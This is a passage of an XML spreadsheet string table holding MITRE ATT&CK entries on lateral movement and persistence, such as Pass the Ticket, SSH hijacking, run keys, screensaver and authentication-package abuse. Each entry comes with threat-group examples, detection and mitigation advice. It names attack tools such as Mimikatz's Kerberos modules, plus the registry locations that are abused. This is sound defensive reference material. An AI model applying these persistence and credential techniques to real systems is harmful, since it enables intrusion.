    <t>Monitor application deployments from a secondary system. Perform application deployment at regular times so that irregular deployment activity stands out. Monitor process activity that does not correlate to known good software. Monitor account login activity on the deployment system. ,</t>
  </si>
  <si>
    <t>Grant access to application deployment systems only to a limited number of authorized administrators. Ensure proper system and access isolation for critical network systems through use of firewalls, account privilege separation, group policy, and multifactor authentication. Verify that account credentials that may be used to access deployment systems are unique and not used throughout the enterprise network. Patch deployment systems regularly to prevent potential remote access through [[Technique/T1068|Exploitation of Vulnerability]]. 
If the application deployment system can be configured to deploy only signed binaries, then ensure that the trusted signing certificates are not co-located with the application deployment system and are instead located on a system that cannot be accessed remotely or to which remote access is tightly controlled.</t>
  </si>
  <si>
    <t>Access to application deployment software (EPO, HPCA, Altiris, etc.)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1017</t>
  </si>
  <si>
    <t>[[Software/S0056|Net Crawler]] uses Windows admin shares to establish authenticated sessions to remote systems over SMB as part of lateral movement.[[CiteRef::Cylance Cleaver]]</t>
  </si>
  <si>
    <t>[[Software/S0154|Cobalt Strike]] can use Window admin shares (C$ and ADMIN$) for lateral movement.[[CiteRef::Cobalt Strike TTPs Dec 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0009|Deep Panda]] uses net.exe to connect to network shares using &lt;code&gt;net use&lt;/code&gt; commands with compromised credentials.[[CiteRef::Alperovitch 2014]]</t>
  </si>
  <si>
    <t>[[Software/S0154|Cobalt Strike]] can SSH to a remote service.[[CiteRef::Cobalt Strike TTPs Dec 2017]]</t>
  </si>
  <si>
    <t>Pass the Ticket</t>
  </si>
  <si>
    <t>[[Software/S0002|Mimikatz]]?s &lt;code&gt;LSADUMP::DCSync&lt;/code&gt;, &lt;code&gt;KERBEROS::Golden&lt;/code&gt;, and &lt;code&gt;KERBEROS::PTT&lt;/code&gt; modules implement the three steps required to extract the krbtgt account hash and create/use Kerberos tickets.[[CiteRef::Adsecurity Mimikatz Guide]][[CiteRef::Harmj0y DCSync Sept 2015]][[CiteRef::AdSecurity Kerberos GT Aug 2015]]</t>
  </si>
  <si>
    <t>Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
Event ID 4769 is generated on the Domain Controller when using a golden ticket after the KRBTGT password has been reset twice, as mentioned in the mitigation section. The status code 0x1F indicates the action has failed due to "Integrity check on decrypted field failed" and indicates misuse by a previously invalidated golden ticket.[[CiteRef::CERT-EU Golden Ticket Protection]] ,</t>
  </si>
  <si>
    <t>Monitor domains for unusual credential logons. Limit credential overlap across systems to prevent the damage of credential compromise. Ensure that local administrator accounts have complex, unique passwords. Do not allow a user to be a local administrator for multiple systems. Limit domain admin account permissions to domain controllers and limited servers. Delegate other admin functions to separate accounts.[[CiteRef::ADSecurity AD Kerberos Attacks]]
For containing the impact of a previously generated golden ticket, reset the built-in KRBTGT account password twice, which will invalidate any existing golden tickets that have been created with the KRBTGT hash and other Kerberos tickets derived from it.[[CiteRef::CERT-EU Golden Ticket Protection]]
Attempt to identify and block unknown or malicious software that could be used to obtain Kerberos tickets and use them to authenticate by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>Requires Microsoft Windows as a target system and Kerberos authentication enabled.</t>
  </si>
  <si>
    <t>Ryan Becwar,Vincent Le Toux</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1097</t>
  </si>
  <si>
    <t>can execute commands remotely by creating a new service on the remote system [[CiteRef::Symantec Buckeye]].</t>
  </si>
  <si>
    <t>GCMAN</t>
  </si>
  <si>
    <t>GCMAN ,</t>
  </si>
  <si>
    <t>G0036</t>
  </si>
  <si>
    <t>[[Group/G0036|GCMAN]] uses Putty and VNC for lateral movement.[[CiteRef::Securelist GCMAN]]</t>
  </si>
  <si>
    <t>Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.
In this technique, valid Kerberos tickets for [[Technique/T1078|Valid Accounts]] are captured by [[Technique/T1003|Credential Dumping]]. A user's service tickets or ticket granting ticket (TGT) may be obtained, depending on the level of access. A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges to access.[[CiteRef::ADSecurity AD Kerberos Attacks]][[CiteRef::GentilKiwi Pass the Ticket]]
Silver Tickets can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint).[[CiteRef::ADSecurity AD Kerberos Attacks]]
Golden Tickets can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory.[[CiteRef::Campbell 2014]]</t>
  </si>
  <si>
    <t>[[Group/G0045|menuPass]] has used Putty Secure Copy Client (PSCP) to transfer data.[[CiteRef::PWC Cloud Hopper April 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0049|OilRig]] has used Putty to access compromised systems.[[CiteRef::Unit 42 Playbook OilRig Dec 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0028|Threat Group-1314]] actors mapped network drives using &lt;code&gt;net use&lt;/code&gt;.[[CiteRef::Dell TG-1314]]</t>
  </si>
  <si>
    <t>[[Software/S0089|BlackEnergy]] has run a plug-in on a victim to spread through the local network by using [[Software/S0029|PsExec]] and accessing admin shares.[[CiteRef::Securelist BlackEnergy Nov 2014]]</t>
  </si>
  <si>
    <t>SSH Hijacking</t>
  </si>
  <si>
    <t>Secure Shell (SSH) is a standard means of remote access on Linux and Mac systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.
In order to move laterally from a compromised host, adversaries may take advantage of trust relationships established with other systems via public key authentication in active SSH sessions by hijacking an existing connection to another system. This may occur through compromising the SSH agent itself or by having access to the agent's socket. If an adversary is able to obtain root access, then hijacking SSH sessions is likely trivial.[[CiteRef::Slideshare Abusing SSH]][[CiteRef::SSHjack Blackhat]][[CiteRef::Clockwork SSH Agent Hijacking]] Compromising the SSH agent also provides access to intercept SSH credentials.[[CiteRef::Welivesecurity Ebury SSH]]
[[Technique/T1184|SSH Hijacking]] differs from use of [[Technique/T1021|Remote Services]] because it injects into an existing SSH session rather than creating a new session using [[Technique/T1078|Valid Accounts]].</t>
  </si>
  <si>
    <t>Use of SSH may be legitimate, depending upon the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with SSH. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time. Also monitor user SSH-agent socket files being used by different users. ,</t>
  </si>
  <si>
    <t>Ensure SSH key pairs have strong passwords and refrain from using key-store technologies such as ssh-agent unless they are properly protected. Ensure that all private keys are stored securely in locations where only the legitimate owner has access to with strong passwords and are rotated frequently. Ensure proper file permissions are set and harden system to prevent root privilege escalation opportunities. Do not allow remote access via SSH as root or other privileged accounts. Ensure that agent forwarding is disabled on systems that do not explicitly require this feature to prevent misuse.[[CiteRef::Symantec SSH and ssh-agent]]</t>
  </si>
  <si>
    <t>User,root</t>
  </si>
  <si>
    <t>SSH service enabled, trust relationships configured, established connections</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1184</t>
  </si>
  <si>
    <t>[[Group/G0010|Turla]] uses &lt;code&gt;net use&lt;/code&gt; commands to connect to lateral systems within a network.[[CiteRef::Kaspersky Turla]]</t>
  </si>
  <si>
    <t>Taint Shared Content</t>
  </si>
  <si>
    <t>[[Group/G0012|Darkhotel]] uses a virus that propagates by infecting executables stored on shared drives.[[CiteRef::Kaspersky Darkhotel]]</t>
  </si>
  <si>
    <t>Processes that write or overwrite many files to a network shared directory may be suspicious. Monitor processes that are executed from removable media for malicious or abnormal activity such as network connections due to [[Command and Control]] and possible network [[Discovery]] techniques. ,</t>
  </si>
  <si>
    <t>Protect shared folders by minimizing users who have write access. Use utilities that detect or mitigate common features used in exploitation, such as the Microsoft Enhanced Mitigation Experience Toolkit (EMET).
Identify potentially malicious software that may be used to taint content or may result from it and audit and/or block the unknown programs by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>Access to shared folders and content with write permissions</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1080</t>
  </si>
  <si>
    <t>Windows Distributed Component Object Model (DCOM) is transparent middleware that extends the functionality of Component Object Model (COM)[[CiteRef::Microsoft COM]] beyond a local computer using remote procedure call (RPC) technology. COM is a component of the Windows application programming interface (API) that enables interaction between software objects. Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE).
Permissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry.[[CiteRef::Microsoft COM ACL]][[CiteRef::Microsoft Process Wide Com Keys]][[CiteRef::Microsoft System Wide Com Keys]] By default, only Administrators may remotely activate and launch COM objects through DCOM.
Adversaries may use DCOM for lateral movement. Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications[[CiteRef::Enigma Outlook DCOM Lateral Movement Nov 2017]] as well as other Windows objects that contain insecure methods.[[CiteRef::Enigma MMC20 COM Jan 2017]][[CiteRef::Enigma DCOM Lateral Movement Jan 2017]] DCOM can also execute macros in existing documents[[CiteRef::Enigma Excel DCOM Sept 2017]] and may also invoke [[Technique/T1173|Dynamic Data Exchange]] (DDE) execution directly through a COM created instance of a Microsoft Office application[[CiteRef::Cyberreason DCOM DDE Lateral Movement Nov 2017]], bypassing the need for a malicious document.</t>
  </si>
  <si>
    <t>[[Group/G0004|Ke3chang]] actors have been known to copy files to the network shares of other computers to move laterally.[[CiteRef::Villeneuve et al 2014]]</t>
  </si>
  <si>
    <t>[[Group/G0032|Lazarus Group]] malware SierraAlfa accesses the &lt;code&gt;ADMIN$&lt;/code&gt; share via SMB to conduct lateral movement.[[CiteRef::Novetta Blockbuster RATs]]</t>
  </si>
  <si>
    <t>[[Group/G0007|APT28]] has used pass the hash for lateral movement.[[CiteRef::Microsoft SIR Vol 19]]</t>
  </si>
  <si>
    <t>[[Group/G0050|APT32]] compromised McAfee ePO to move laterally by distributing malware as a software deployment task.[[CiteRef::FireEye APT32 May 2017]]</t>
  </si>
  <si>
    <t>Some [[Software/S0053|SeaDuke]] samples have a module to use pass the ticket with Kerberos for authentication.[[CiteRef::Symantec Seaduke 2015]]</t>
  </si>
  <si>
    <t>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t>
  </si>
  <si>
    <t>[[Group/G0016|APT29]] used Kerberos ticket attacks for lateral movement.[[CiteRef::Mandiant No Easy Breach]]</t>
  </si>
  <si>
    <t>[[Group/G0049|OilRig]] has used Remote Desktop Protocol to access compromised systems.[[CiteRef::Unit 42 Playbook OilRig Dec 2017]]</t>
  </si>
  <si>
    <t>The [[Group/G0006|APT1]] group is known to have used pass the hash.[[CiteRef::Mandiant APT1]]</t>
  </si>
  <si>
    <t>Software: Pass-The-Hash Toolkit</t>
  </si>
  <si>
    <t>[[Software/S0122|Pass-The-Hash Toolkit]] can perform pass the hash.[[CiteRef::Mandiant APT1]]</t>
  </si>
  <si>
    <t>[[Group/G0060|BRONZE BUTLER]] has created forged Kerberos Ticket Granting Ticket (TGT) and Ticket Granting Service (TGS) tickets to maintain administrative access.[[CiteRef::Secureworks BRONZE BUTLER Oct 2017]]</t>
  </si>
  <si>
    <t>Lateral Movement,Credential Access</t>
  </si>
  <si>
    <t>Replication Through Removable Media</t>
  </si>
  <si>
    <t>[[Group/G0007|APT28]] uses a tool to infect connected USB devices and transmit itself to air-gapped computers when the infected USB device is inserted.[[CiteRef::Microsoft SIR Vol 19]]</t>
  </si>
  <si>
    <t>Monitor file access on removable media. Detect processes that execute from removable media after it is mounted or when initiated by a user. If a remote access tool is used in this manner to move laterally, then additional actions are likely to occur after execution, such as opening network connections for [[Command and Control]] and system and network information [[Discovery]]. ,</t>
  </si>
  <si>
    <t>Disable Autorun if it is unnecessary.[[CiteRef::Microsoft Disable Autorun]] Disallow or restrict removable media at an organizational policy level if it is not required for business operations.[[CiteRef::TechNet Removable Media Control]]
Identify potentially malicious software that may be used to infect removable media or may result from tainted removable media, and audit and/or block it by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>Removable media allowed, Autorun enabled or vulnerability present that allows for code execution</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1091</t>
  </si>
  <si>
    <t>[[Software/S0136|USBStealer]] drops itself onto removable media and relies on Autorun to execute the malicious file when a user opens the removable media on another system.[[CiteRef::ESET Sednit USBStealer 2014]]</t>
  </si>
  <si>
    <t>Part of [[Group/G0007|APT28]]'s operation involved using [[Software/S0023|CHOPSTICK]] modules to copy itself to air-gapped machines and using files written to USB sticks to transfer data and command traffic.[[CiteRef::FireEye APT28]][[CiteRef::Microsoft SIR Vol 19]]</t>
  </si>
  <si>
    <t>[[Software/S0062|DustySky]] searches for removable media and duplicates itself onto it.[[CiteRef::DustySky]]</t>
  </si>
  <si>
    <t>[[Software/S0130|Unknown Logger]] is capable of spreading to USB devices.[[CiteRef::Forcepoint Monsoon]]</t>
  </si>
  <si>
    <t>Software: SHIPSHAPE</t>
  </si>
  <si>
    <t>[[Group/G0013|APT30]] may have used the [[Software/S0028|SHIPSHAPE]] malware to move onto air-gapped networks. [[Software/S0028|SHIPSHAPE]] targets removable drives to spread to other systems by modifying the drive to use Autorun to execute or by hiding legitimate document files and copying an executable to the folder with the same name as the legitimate document.[[CiteRef::FireEye APT30]]</t>
  </si>
  <si>
    <t>[[Group/G0012|Darkhotel]]'s selective infector modifies executables stored on removable media as a method of spreading across computers.[[CiteRef::Kaspersky Darkhotel]]</t>
  </si>
  <si>
    <t>Adversaries may move to additional systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into another system and executes. This may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system.</t>
  </si>
  <si>
    <t>Lateral Movement,Persistence</t>
  </si>
  <si>
    <t>Logon Scripts</t>
  </si>
  <si>
    <t>===Windows===
Windows allows logon scripts to be run whenever a specific user or group of users log into a system.[[CiteRef::TechNet Logon Scripts]] The scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server.
If adversaries can access these scripts, they may insert additional code into the logon script to execute their tools when a user logs in. This code can allow them to maintain persistence on a single system, if it is a local script, or to move laterally within a network, if the script is stored on a central server and pushed to many systems. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary.
===Mac===
Mac allows login and logoff hooks to be run as root whenever a specific user logs into or out of a system. A login hook tells Mac OS X to execute a certain script when a user logs in, but unlike startup items, a login hook executes as root[[CiteRef::creating login hook]]. There can only be one login hook at a time though. If adversaries can access these scripts, they can insert additional code to the script to execute their tools when a user logs in.</t>
  </si>
  <si>
    <t>Monitor logon scripts for unusual access by abnormal users or at abnormal times. Look for files added or modified by unusual accounts outside of normal administration duties. ,</t>
  </si>
  <si>
    <t>Restrict write access to logon scripts to specific administrators. Prevent access to administrator accounts by mitigating [[Credential Access]] techniques and limiting account access and permissions of [[Technique/T1078|Valid Accounts]].
Identify and block potentially malicious software that may be executed through logon script modification by using whitelisting[[CiteRef::Beechey 2010]] tools like AppLocker[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] that are capable of auditing and/or blocking unknown programs.</t>
  </si>
  <si>
    <t>Write access to system or domain logon scripts</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1037</t>
  </si>
  <si>
    <t>[[Software/S0044|JHUHUGIT]] has registered a Windows shell script under the Registry key HKCU\Environment\UserInitMprLogonScript to establish persistence.[[CiteRef::ESET Sednit Part 1]]</t>
  </si>
  <si>
    <t>Persistence</t>
  </si>
  <si>
    <t>Windows Management Instrumentation Event Subscription</t>
  </si>
  <si>
    <t>[[Group/G0016|APT29]] has used WMI event filters to establish persistence.[[CiteRef::Mandiant No Easy Breach]]</t>
  </si>
  <si>
    <t>WMI Objects</t>
  </si>
  <si>
    <t>Monitor WMI event subscription entries, comparing current WMI event subscriptions to known good subscriptions for each host. Tools such as Sysinternals Autoruns may also be used to detect WMI changes that could be attempts at persistence.[[CiteRef::TechNet Autoruns]] ,</t>
  </si>
  <si>
    <t>Disabling WMI services may cause system instability and should be evaluated to assess the impact to a network. By default, only administrators are allowed to connect remotely using WMI; restrict other users that are allowed to connect, or disallow all users from connecting remotely to WMI. Prevent credential overlap across systems of administrator and privileged accounts.[[CiteRef::FireEye WMI 2015]]</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1084</t>
  </si>
  <si>
    <t>Re-opened Applications</t>
  </si>
  <si>
    <t>Starting in Mac OS X 10.7 (Lion), users can specify certain applications to be re-opened when a user reboots their machine. While this is usually done via a Graphical User Interface (GUI) on an app-by-app basis, there are property list files (plist) that contain this information as well located at &lt;code&gt;~/Library/Preferences/com.apple.loginwindow.plist&lt;/code&gt; and &lt;code&gt;~/Library/Preferences/ByHost/com.apple.loginwindow.*.plist&lt;/code&gt;. 
An adversary can modify one of these files directly to include a link to their malicious executable to provide a persistence mechanism each time the user reboots their machine[[CiteRef::Methods of Mac Malware Persistence]].</t>
  </si>
  <si>
    <t>Monitoring the specific plist files associated with reopening applications can indicate when an application has registered itself to be reopened. ,</t>
  </si>
  <si>
    <t>Holding the Shift key while logging in prevents apps from opening automatically[[CiteRef::Re-Open windows on Mac]]. This feature can be disabled entirely with the following terminal command: &lt;code&gt;defaults write -g ApplePersistence -bool no&lt;/code&gt;.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1164</t>
  </si>
  <si>
    <t>Windows Management Instrumentation (WMI) can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. Adversaries may attempt to evade detection of this technique by compiling WMI scripts.[[CiteRef::Dell WMI Persistence]] Examples of events that may be subscribed to are the wall clock time or the computer's uptime.[[CiteRef::Kazanciyan 2014]] Several threat groups have reportedly used this technique to maintain persistence.[[CiteRef::Mandiant M-Trends 2015]]</t>
  </si>
  <si>
    <t>Registry Run Keys / Start Folder</t>
  </si>
  <si>
    <t>Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.[[CiteRef::Microsoft Run Key]] The program will be executed under the context of the user and will have the account's associated permissions level.
Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [[Technique/T1036|Masquerading]] to make the Registry entries look as if they are associated with legitimate programs.</t>
  </si>
  <si>
    <t>Windows Registry,File monitoring</t>
  </si>
  <si>
    <t>Monitor Registry for changes to run keys that do not correlate with known software, patch cycles, etc. Monitor the start folder for additions or changes. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the run keys' Registry locations and startup folders.[[CiteRef::TechNet Autoruns]] Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data.
Changes to these locations typically happen under normal conditions when legitimate software is installed. To increase confidence of malicious activity, data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for [[Command and Control]], learning details about the environment through [[Discovery]], and [[Lateral Movement]]. ,</t>
  </si>
  <si>
    <t>Identify and block potentially malicious software that may be executed through run key or startup folder persistence using whitelisting[[CiteRef::Beechey 2010]] tools like AppLocker[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1060</t>
  </si>
  <si>
    <t>Screensaver</t>
  </si>
  <si>
    <t>Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.[[CiteRef::Wikipedia Screensaver]] The Windows screensaver application scrnsave.exe is located in &lt;code&gt;C:\Windows\System32\&lt;/code&gt; along with screensavers included with base Windows installations. The following screensaver settings are stored in the Registry (&lt;code&gt;HKCU\Control Panel\Desktop\&lt;/code&gt;) and could be manipulated to achieve persistence:
*&lt;code&gt;SCRNSAVE.exe&lt;/code&gt; - set to malicious PE path
*&lt;code&gt;ScreenSaveActive&lt;/code&gt; - set to '1' to enable the screensaver
*&lt;code&gt;ScreenSaverIsSecure&lt;/code&gt; - set to '0' to not require a password to unlock
*&lt;code&gt;ScreenSaverTimeout&lt;/code&gt; - sets user inactivity timeout before screensaver is executed
Adversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity.[[CiteRef::ESET Gazer Aug 2017]]</t>
  </si>
  <si>
    <t>Process Monitoring,Process command-line parameters,Windows Registry,File monitoring</t>
  </si>
  <si>
    <t>Monitor process execution and command-line parameters of .scr files. Monitor changes to screensaver configuration changes in the Registry that may not correlate with typical user behavior.
Tools such as Sysinternals Autoruns can be used to detect changes to the screensaver binary path in the Registry. Suspicious paths and PE files may indicate outliers among legitimate screensavers in a network and should be investigated. ,</t>
  </si>
  <si>
    <t>Block .scr files from being executed from non-standard locations. Set Group Policy to force users to have a dedicated screensaver where local changes should not override the settings to prevent changes. Use Group Policy to disable screensavers if they are unnecessary.[[CiteRef::TechNet Screensaver GP]]</t>
  </si>
  <si>
    <t>Bartosz Jerzman</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1180</t>
  </si>
  <si>
    <t>Rc.common</t>
  </si>
  <si>
    <t>During the boot process, macOS and Linux both execute &lt;code&gt;source /etc/rc.common&lt;/code&gt;, which is a shell script containing various utility functions. This file also defines routines for processing command-line arguments and for gathering system settings, and is thus recommended to include in the start of Startup Item Scripts[[CiteRef::Startup Items]]. In macOS and OS X, this is now a deprecated technique in favor of launch agents and launch daemons, but is currently still used.
Adversaries can use the rc.common file as a way to hide code for persistence that will execute on each reboot as the root user[[CiteRef::Methods of Mac Malware Persistence]].</t>
  </si>
  <si>
    <t>The &lt;code&gt;/etc/rc.common&lt;/code&gt; file can be monitored to detect changes from the company policy. Monitor process execution resulting from the rc.common script for unusual or unknown applications or behavior. ,</t>
  </si>
  <si>
    <t>Limit privileges of user accounts so only authorized users can edit the rc.common file.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1163</t>
  </si>
  <si>
    <t>Authentication Package</t>
  </si>
  <si>
    <t>Windows Authentication Package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.[[CiteRef::MSDN Authentication Packages]]
Adversaries can use the autostart mechanism provided by LSA Authentication Packages for persistence by placing a reference to a binary in the Windows Registry location &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\&lt;/code&gt; with the key value of &lt;code&gt;"Authentication Packages"=&lt;target binary&gt;&lt;/code&gt;. The binary will then be executed by the system when the authentication packages are loaded.</t>
  </si>
  <si>
    <t>DLL monitoring,Windows Registry,Loaded DLLs</t>
  </si>
  <si>
    <t>Monitor the Registry for changes to the LSA Registry keys. Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 R2 may generate events when unsigned DLLs try to load into the LSA by setting the Registry key &lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LSASS.exe&lt;/code&gt; with AuditLevel = 8.[[CiteRef::Graeber 2014]][[CiteRef::Microsoft Configure LSA]] ,</t>
  </si>
  <si>
    <t>Windows 8.1, Windows Server 2012 R2, and later versions, may make LSA run as a Protected Process Light (PPL) by setting the Registry key &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL&lt;/code&gt;, which requires all DLLs loaded by LSA to be signed by Microsoft.[[CiteRef::Graeber 2014]][[CiteRef::Microsoft Configure LSA]]</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1131</t>
  </si>
  <si>
    <t>Netsh Helper DLL</t>
  </si>
  <si>
    <t>Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.[[CiteRef::TechNet Netsh]] The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at &lt;code&gt;HKLM\SOFTWARE\Microsoft\Netsh&lt;/code&gt;.
Adversaries can use netsh.exe with helper DLLs to proxy execution of arbitrary code in a persistent manner when netsh.exe is executed automatically with another [[Persistence]] technique or if other persistent software is present on the system that executes netsh.exe as part of its normal functionality. Examples include some VPN software that invoke netsh.exe.[[CiteRef::Demaske Netsh Persistence]]
Proof of concept code exists to load Cobalt Strike's payload using netsh.exe helper DLLs.[[CiteRef::Github Netsh Helper CS Beacon]]</t>
  </si>
  <si>
    <t>Process monitoring,DLL monitoring,Windows Registry</t>
  </si>
  <si>
    <t>It is likely unusual for netsh.exe to have any child processes in most environments. Monitor process executions and investigate any child processes spawned by netsh.exe for malicious behavior. Monitor the &lt;code&gt;HKLM\SOFTWARE\Microsoft\Netsh&lt;/code&gt; registry key for any new or suspicious entries that do not correlate with known system files or benign software.[[CiteRef::Demaske Netsh Persistence]] ,</t>
  </si>
  <si>
    <t>Identify and block potentially malicious software that may persist in this manner by using whitelisting[[CiteRef::Beechey 2010]] tools capable of monitoring DLL loads by Windows utilities like AppLocker.[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]]</t>
  </si>
  <si>
    <t>[[Software/S0108|netsh]]</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1128</t>
  </si>
  <si>
    <t>Create Account</t>
  </si>
  <si>
    <t>Adversaries with a sufficient level of access may create a local system or domain account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.
The &lt;code&gt;net user&lt;/code&gt; commands can be used to create a local or domain account.</t>
  </si>
  <si>
    <t>Process Monitoring,Process command-line parameters,Authentication logs,Windows event logs</t>
  </si>
  <si>
    <t>Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows system and domain controller.[[CiteRef::Microsoft User Creation Event]] Perform regular audits of domain and local system accounts to detect suspicious accounts that may have been created by an adversary. ,</t>
  </si>
  <si>
    <t>Use and enforce multifactor authentication. Follow guidelines to prevent or limit adversary access to [[Technique/T1078|Valid Accounts]] that may be used to create privileged accounts within an environment.
Adversaries that create local accounts on systems may have limited access within a network if access levels are properly locked down. These accounts may only be needed for persistence on individual systems and their usefulness depends on the utility of the system they reside on.
Protect domain controllers by ensuring proper security configuration for critical servers. Configure access controls and firewalls to limit access to these systems. Do not allow domain administrator accounts to be used for day-to-day operations that may expose them to potential adversaries on unprivileged systems.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1136</t>
  </si>
  <si>
    <t>External Remote Services</t>
  </si>
  <si>
    <t>Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [[Technique/T1028|Windows Remote Management]] can also be used externally.
Adversaries may use remote services to access and persist within a network.[[CiteRef::Volexity Virtual Private Keylogging]] Access to [[Technique/T1078|Valid Accounts]] to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network. Access to remote services may be used as part of [[Technique/T1108|Redundant Access]] during an operation.</t>
  </si>
  <si>
    <t>Follow best practices for detecting adversary use of [[Technique/T1078|Valid Accounts]] for authenticating to remote services. Collect authentication logs and analyze for unusual access patterns, windows of activity, and access outside of normal business hours. ,</t>
  </si>
  <si>
    <t>Limit access to remote services through centrally managed concentrators such as VPNs and other managed remote access systems. Deny direct remote access to internal systems through uses of network proxies, gateways, and firewalls as appropriate. Disable or block services such as [[Technique/T1028|Windows Remote Management]] can be used externally. Use strong two-factor or multi-factor authentication for remote service accounts to mitigate an adversary's ability to leverage stolen credentials, but be aware of [[Technique/T1111|Two-Factor Authentication Interception]] techniques for some two-factor authentication implementations.</t>
  </si>
  <si>
    <t>Daniel Oakley,Travis Smith, Tripwire</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1133</t>
  </si>
  <si>
    <t>Modify Existing Service</t>
  </si>
  <si>
    <t>Windows service configuration information, including the file path to the service's executable, is stored in the Registry. Service configurations can be modified using utilities such as sc.exe and [[Software/S0075|Reg]].
Adversaries can modify an existing service to persist malware on a system by using system utilities or by using custom tools to interact with the Windows API. Use of existing services is a type of [[Technique/T1036|Masquerading]] that may make detection analysis more challenging. Modifying existing services may interrupt their functionality or may enable services that are disabled or otherwise not commonly used.</t>
  </si>
  <si>
    <t>Look for changes to service Registry entries that do not correlate with known software, patch cycles, etc. Changes to the binary path and the service startup type changed from manual or disabled to automatic, if it does not typically do so, may be suspicious. Tools such as Sysinternals Autoruns may also be used to detect system service changes that could be attempts at persistence.[[CiteRef::TechNet Autoruns]] 
Service information is stored in the Registry at &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Services&lt;/code&gt;.
Command-line invocation of tools capable of modifying services may be unusual, depending on how systems are typically used in a particular environment. Collect service utility execution and service binary path arguments used for analysis. Service binary paths may even be changed to execute [[Software/S0106|cmd]] commands or scripts.
